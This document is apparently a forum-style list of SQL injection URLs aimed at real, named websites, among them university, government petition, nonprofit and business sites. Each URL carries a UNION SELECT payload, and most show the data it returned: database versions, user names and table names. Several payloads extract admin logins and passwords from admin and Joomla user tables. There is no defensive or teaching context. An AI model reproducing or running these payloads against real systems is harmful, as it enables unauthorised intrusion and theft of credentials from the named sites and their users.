http://www.whr.org.np/event/event.php?id=-1+union+select+1,2,3,concat_Ws(0x3a,version(),database(),user()),5,6,7-- 4.1.22-standard:whrorg_whrsanwedorg:whrorg_user@localhost
http://www.disabilityconsultants.org.au/findconsultant.php?command=showbigconsultant&itemtypeid=6&consultantsid=-6+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- Database Version: 5.0.81-community Database name: disabili_disabilityconsultants User name: disabili_chris@localhost Os : pc-linux-gnu
http://www.np-icet.ru/index1.php?key=russeminars&id=-1+union+select+1,concat_Ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10-- 5.0.51:db5709j:us5709j@localhost tables: pages_topics,news,seminars_rus,pages_additional,seminars_world,pages_index,pages_subtopics,banners
http://www.entacom.com.au/?p=catalog&c=21&s=-658+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12--&v=RZ-DESTRUCTOR Database Version: 4.1.22-standard-log Database name: scott_entacom User name: scott_root@localhost Os : unknown-linux-gnu
http://www.terminators.ru/index.php?mode=5&rw_key=-1+union+select+version(),user(),data base(),@@version_compile_os/* Database Version: 4.1.22-log Database name: wwwterminatorsru User name: termin03@localhost OS: portbld-freebsd6.2
http://www.campingworld.com.au/site/products.php?prodid=-154+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),17,18,19,20/*&iscatid=13&issubid=32 Database Version: 4.1.22 Database name: cms_db User name: cmsuser@localhost Os : redhat-linux-gnu
http://itp.nyu.edu PR 6 Code: http://itp.nyu.edu/thesis/spring2007/stream.php?movieID=1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14/* Database Version - 5.0.45-log Database name - video_comments User name - vc_update@localhost
http://mbantua[dot]com[dot]au PR 5 http://mbantua[dot]com[dot]au/news.php?id=9999+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9-- user() = [email protected] version() = 5.0.67-log database() = Mbantua_website admin password http://mbantua[dot]com[dot]au/news.php?id=-55+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9+from+admin-- the admin panel itself http://mbantua[dot]com[dot]au/admin
Code: http://www.etechnology.ru/mk.php?id=-1001+union+select+1,concat_ws(0x3a,version(),user(),database()),3 4.0.27-log:[email protected]:etechnology Code: http://www.swiss-luxury-world.ch/watches/en/watchbrands/marke/mk.php?md=405&id=-4+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4 output in the title Code: http://www.cmes.arizona.edu/resources/mp.php?id=-23+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 4.0.12:cmes_web@localhost:cmes Code: http://www.rallyonline.pl/mp.php?1&&modex=pokaz&T[id]=-1163+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 5.1.30-log:mysql@localhost:rallyonline_utf Code: http://2b-i.co.uk/2B-me.php?id=-13+union+select+concat_ws(0x3a,version(),user(),database()) 5.0.67-community:ibmys0_web2bi@localhost:ibmys0_db2bi Code: http://confident-image.co.uk/2B-me.php?id=-32+union+select+concat_ws(0x3a,version(),user(),database()) 5.0.67-community:ibmys0_web2bi@localhost:ibmys0_db2bi Code: http://www.klara-rulikova.cz/volby-do-senatu-pisi-o-me.php?ID=-1+union+selecT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 5.0.51a-3ubuntu5.4-log:[email protected]:klararulik Code: http://global-travel.mobi/hotels-my.php?id=4882+and+substring(version(),1,1)=5 Code: http://www.latoi.com/my.php?user_id=2205&id=532+and+substring(version(),1,1)=4 Code: http://www.tuk-tuk.com/member/my.php?id=198+and+substring(version(),1,1)=5 Code: http://www.akademik-m.by/page.php?id=43+and+substring(version(),1,1)=5
nibulon_31@localhost 5.0.67-0ubuntu6 nibulon_31 komsomol_alex@localhost 5.0.77-community komsomol_komsomol
http://www.avto-tyre.ru/item_view.php?item_id=-1407+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+--+ http://www.elmash-holding.ru/elmcatalog/item/?item_id=473+union+select+1,2,3,4,database(),6,7+/*+ elektromash http://www.elmh.ru/elmcatalog/item/?item_id=453+union+select+1,2,3,4,version(),6,7+/*+ 4.0.27-log Tic 1000 http://www.litsovet.ru/index.php/litob.journal.view?item_id=-193+UNION+SELECT+1,2,3,concat_ws(0x3a3a,admin_login,admin_psw,admin_name,admin_mail),5,6,7,8,9,10,11,12,13,14,15+from+tbl_admin+--+ litob.journal.view?item_id=-193+UNION+SELECT+1,2,3,concat_ws(0x3a3a,admin_id,admin_name,admin_login,admin_password,admin_status),5,6,7,8,9,10,11,12,13,14,15+from+admin+--+
I saw this site today in PHP injections. I thought... I'll take a look: maybe there's something else... Turned out there is. May Adm1n4eG forgive me. VERSION(): 5.0.16 USER(): [email protected] BAZA(): govor OS(): portbld-freebsd6.0 Tables: GAccess,GBase,GBaseImg,GHotLink,GHotel,GHotelImg,GNews,GNewsImg,GPlace,GPlaceB,GSeason,GTour,GTourImg,GType,forum,new,news Columns in table GAccess: GAcId,GLog,GPass,GIP,GSet And here is the long-awaited admin...
Code: http://www.aikidoural.ru/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,%20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/* Code: http://tango.net.ua/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,%20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*
Code: http://avtos.su/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0%20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/* Code: http://www.milkoff.ru/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0%20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*
Code: http://www.suncity-travel.com/index.php?id=34+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11+limit+1,1/* version():4.0.23a-log database():suncity user():scorp@localhost __ Code: http://www.mathrubhumi.org/travel/news.php?id=8935+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19 version():5.0.45 database():entravel user():dedop@localhost __ Code: http://www.azores.com/travel/tour.php?id=56+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47++limit+1,1/* version():5.0.45 database():azoresco user():azoresco@localhost __ Code: http://soloentreamigas.com.ve/articulo.php?ID=60+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/* version():5.0.37-community-log database():chicas user():[email protected] __ Code: http://www.cavim.com.ve/pub.php?id=40+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18 version():5.0.51a-community-log database():cavimc_cavim user():cavimc_sa@localhost __ Code: http://epetitions.bristol.gov.uk/petition.php?id=166+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15 version():5.0.60-log database():bristol_epetitioner user():epetitioner_user@localhost